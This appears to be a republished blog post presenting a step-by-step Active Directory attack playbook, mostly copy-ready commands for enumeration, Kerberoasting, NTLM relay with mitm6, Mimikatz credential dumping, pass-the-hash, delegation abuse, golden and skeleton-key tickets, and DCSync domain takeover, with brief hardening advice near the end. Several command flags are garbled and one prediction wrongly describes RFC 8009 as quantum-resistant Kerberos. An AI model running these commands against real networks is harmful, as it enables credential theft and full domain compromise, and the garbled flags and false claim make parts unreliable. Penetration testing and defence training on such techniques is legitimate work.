Master Active Directory Penetration Testing: The Ultimate Step‑by‑Step AD Attack Path Guide (2026 Edition) + Video

Listen to this Post

Featured Image

Introduction:

Active Directory (AD) remains the most targeted identity system in enterprise environments, with 74% of breaches involving compromised identities according to the Verizon DBIR 2025. This guide transforms the “AD Pentest Mindmap” from a static visual into an actionable, hands‑on playbook. You will learn to navigate the full attack lifecycle — from stealthy enumeration to complete domain takeover — using real commands, proven tools, and defensive countermeasures.

Learning Objectives:

– Objective 1: Perform comprehensive AD enumeration using PowerView, BloodHound, and native Windows/Linux tools.
– Objective 2: Execute and mitigate key credential attacks, including Kerberoasting, AS‑REP Roasting, and NTLM relay.
– Objective 3: Master lateral movement, privilege escalation, persistence, and domain dominance techniques with Mimikatz, Impacket, and Rubeus.

You Should Know:

1. Enumeration: Laying the Foundation for Attack

Effective reconnaissance is the cornerstone of any AD compromise. Attackers first map the domain structure, users, groups, and systems to identify misconfigurations and potential entry points.

Step‑by‑Step Guide

1.1. Linux‑Based Enumeration (From a Non‑Domain Joined Attack Box)

 Add target domain and DC to /etc/hosts
echo "192.168.1.10 dc.domain.local domain.local" >> /etc/hosts

 Basic LDAP enumeration with ldapsearch
ldapsearch -x -H ldap://dc.domain.local -b "DC=domain,DC=local" -D "DOMAIN\username" -w 'password'

 SMB share enumeration
smbclient -L //dc.domain.local -U domain.local/username%password
enum4linux -a 192.168.1.10

 Kerberos user enumeration with Kerbrute
kerbrute userenum -d domain.local --dc 192.168.1.10 user_wordlist.txt

1.2. Windows‑Based In‑Depth Enumeration (Compromised Domain‑Joined Host)

 Load PowerView (part of PowerSploit)
Import-Module .\PowerView.ps1

 Get current domain and SID
Get-Domain
Get-DomainSID

 Enumerate all domain users and export to file
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt

 Find users with specific properties (e.g., SPN set)
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname

 Enumerate domain computers with operating system
Get-DomainComputer -Properties OperatingSystem,Name,DnsHostName | Sort-Object -Property DnsHostName

 Identify live machines
Get-DomainComputer -Ping -Properties OperatingSystem,Name,DnsHostName

 Find domain admins
Get-DomainGroupMember -Identity "Domain Admins" | Select-Object MemberName

 Enumerate ACLs for a specific object
Get-DomainObjectAcl -Identity "TargetUser" -ResolveGUIDs

1.3. BloodHound: Visualizing Attack Paths

 Data collection from Linux using BloodHound.py
bloodhound-python -d domain.local -u username -p 'password' -1s 192.168.1.10 -c All

 On Windows, use SharpHound (PowerShell)
.\SharpHound.exe -c All,GPOLocalGroup,LoggedOn --domain domain.local

 Import JSON files into BloodHound GUI (Neo4j backend)
 Then run Cypher queries, e.g., "Find all Domain Admins"
MATCH (u:User) WHERE u.domain = "DOMAIN.LOCAL" AND u.admincount = True RETURN u

BloodHound.py is a python data collector used to enumerate Active Directory information and store the data in JSON files that can be ingested by the BloodHound UI.

2. Credential Attacks & Exploitation: Stealing Keys to the Kingdom

Once enumeration is complete, attackers extract credentials via Kerberos abuses, NTLM relaying, and hash dumping.

Step‑by‑Step Guide

2.1. Kerberoasting & AS‑REP Roasting

 From Linux with Impacket
 Request Kerberos TGS for accounts with SPNs (Kerberoasting)
GetUserSPNs.py domain.local/username:password -dc-ip 192.168.1.10 -request

 Crack obtained hash with hashcat
hashcat -m 13100 kerberoast_hash.txt /usr/share/wordlists/rockyou.txt

 AS‑REP Roasting for users without pre‑authentication
GetNPUsers.py domain.local/ -usersfile usernames.txt -dc-ip 192.168.1.10 -format hashcat

2.2. NTLM Relay & Pass‑the‑Hash (PtH) Attacks

 Set up NTLM relay with ntlmrelayx (Impacket)
ntlmrelayx.py -tf targets.txt -smb2support -of hashes.txt

 Combine with MITM6 to poison IPv6 DNS (full domain takeover)
mitm6 -d domain.local
 Then relay captured NTLM auth to LDAP/LDAPS to create a malicious machine account

 From Windows, perform Pass‑the‑Hash
 Load Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords  Dump NTLM hashes from LSASS

 Pass the hash to another machine
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash_value
 Then launch cmd or PSExec to the target

2.3. Dumping Credentials with Mimikatz

 Invoke Mimikatz via PowerShell (must be elevated)
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'

 Extract Kerberos tickets
Invoke-Mimikatz -Command '"kerberos::list" "kerberos::tgt"'

Pass‑the‑Hash attacks facilitate lateral movement by allowing the reuse of stolen NTLM hashes without cracking passwords, which can lead to privilege escalation and domain compromise. Kerberoasting enables offline cracking of passwords for accounts with SPNs.

3. Lateral Movement & Privilege Escalation: Spreading Through the Network

With valid credentials, attackers pivot across systems, escalating from a standard user to domain administrator.

Step‑by‑Step Guide

3.1. PowerShell Remoting & WinRM

 Enable PSRemoting on target (if not already)
Enable-PSRemoting -Force

 Invoke command remotely
Invoke-Command -ComputerName TARGET -ScriptBlock { whoami } -Credential $cred

 Establish persistent session
$session = New-PSSession -ComputerName TARGET -Credential $cred
Enter-PSSession $session

3.2. Impacket Suite for Remote Code Execution

 Execute commands via SMB (psexec)
psexec.py domain.local/administrator:'password'@192.168.1.20

 Pass‑the‑hash with wmiexec
wmiexec.py -hashes :ntlm_hash domain.local/[email protected]

 Remote service control with atexec
atexec.py domain.local/administrator:'password'@192.168.1.20 'whoami'

3.3. Exploiting Delegation & ACLs

 Abuse Resource‑Based Constrained Delegation (RBCD)
 Create a new computer account (by default any domain user can create up to 10)
addcomputer.py -computer-1ame 'ATTACKER$' -computer-pass 'Password123' domain.local/username:password

 Then set RBCD on a target machine
rbcd.py -delegate-from 'ATTACKER$' -delegate-to 'DC$' -action write domain.local/username:password

 Now impersonate domain admin to request a service ticket
getST.py -spn 'cifs/dc.domain.local' -impersonate 'Administrator' domain.local/attacker$:Password123

4. Persistence & Post‑Exploitation: Ensuring Long‑Term Access

Once domain dominance is achieved, attackers install backdoors that survive reboots and password changes.

Step‑by‑Step Guide

4.1. Golden Ticket Attack

 From a compromised domain controller, retrieve krbtgt hash
mimikatz.exe
lsadump::dcsync /user:domain\krbtgt

 Forge a golden ticket (valid for any user for 10 years)
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:krbtgt_hash /id:500 /ptt

 Now access any resource without authentication
dir \\dc.domain.local\c$

4.2. Skeleton Key Attack

 Inject a skeleton key into LSASS on the Domain Controller
mimikatz.exe
privilege::debug
misc::skeleton

 Any domain user can now authenticate using the master password "mimikatz"
net use \\dc.domain.local\IPC$ /user:domain.local\anyuser mimikatz

The Golden Ticket attack uses the `krbtgt` account’s NTLM hash to forge Kerberos TGTs, granting unrestricted domain access. The Skeleton Key attack patches LSASS to accept a universal master password, enabling persistent access without raising alerts.

5. Domain Dominance: The Final Objective

Domain dominance means full administrative control over the Active Directory forest, allowing attackers to disable logging, extract all data, and use the domain as a launchpad for further attacks.

Step‑by‑Step Guide

5.1. DCSync Attack – Extracting Every Credential

 From a compromised account with replication rights
secretsdump.py domain.local/administrator:'password'@192.168.1.10 -just-dc-1tlm

 Use Mimikatz to perform DCSync remotely
mimikatz.exe
lsadump::dcsync /user:domain.local\krbtgt
lsadump::dcsync /user:domain.local\Administrator

5.2. MITM6 + NTLM Relay Chain – Complete Domain Compromise Without Malware

 Attacker machine:
mitm6 -d domain.local  Spoof DHCPv6/DNS
ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker.wpad -add-computer

 The relayed authentication creates a machine account with RBCD
 Then impersonate Domain Admin to dump NTDS.dit
secretsdump.py -hashes :relayed_hash domain.local/COMPUTER\[email protected]

 Use CrackMapExec for lateral movement and data extraction
crackmapexec smb domain.local -u administrator -H ntlm_hash --1tds drsuapi

This attack chain weaponizes default IPv6 behavior in Windows networks to relay NTLM authentications, creating a new machine account that can impersonate any privileged user, ultimately seizing domain‑wide control.

What Undercode Say:

– Key Takeaway 1: Active Directory pentesting is not a linear process; it requires iterative enumeration, exploitation, and pivoting. Tools like BloodHound and PowerView are essential for mapping complex ACLs and trust relationships.
– Key Takeaway 2: Defenders must focus on reducing the attack surface: disable NTLM where possible, enforce Kerberos with AES, limit `ms-DS-MachineAccountQuota` to 0, and monitor for abnormal replication requests (DCSync) and anomaly Kerberos ticket requests.

Analysis (approx. 10 lines):

Modern AD environments remain critically vulnerable to identity‑based attacks. The shift from malware‑centric to credential‑centric breaches (74% of incidents) underscores that traditional antivirus and perimeter defenses are obsolete. Attackers now chain seemingly low‑severity misconfigurations — such as over‑privileged ACLs, unconstrained delegation, and IPv6 reliance — into full domain compromise within minutes. For blue teams, the focus must shift to continuous identity risk visualization (e.g., BloodHound CE, Qualys ETM) and proactive hardening: disable IPv6 if unused, enforce SMB signing, rotate `krbtgt` passwords regularly, and implement tiered administrative models. Organizations that fail to adopt these measures will inevitably suffer a catastrophic AD breach.

Prediction:

– +1 AI‑driven AD attack path mapping tools will soon automate 80% of enumeration and privilege escalation, reducing skilled hacker time from days to minutes.
– -1 As more enterprises migrate to Azure AD/Entra ID, legacy on‑prem AD forests will become neglected “shadow IT” backdoors, increasingly targeted by ransomware groups.
– -1 The rise of quantum‑resistant Kerberos (RFC 8009) will render many current golden‑ticket mitigation techniques ineffective, creating a new wave of exploit opportunities.
– +1 Defensive AI that correlates LDAP queries, Kerberos ticket requests, and replication activities will detect in‑progress attacks in real time, blocking lateral movement before domain takeover.
– -1 Homomorphic encryption integrated into AD could make traditional credential dumping obsolete, forcing attackers to shift to supply‑chain and social‑engineering vectors.

▶️ Related Video (80% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: [Shikhhayadav Activedirectory](https://www.linkedin.com/posts/shikhhayadav_activedirectory-redteam-pentesting-share-7464215481902600192-NbDq/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)

📢 Follow UndercodeTesting & Stay Tuned:

[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)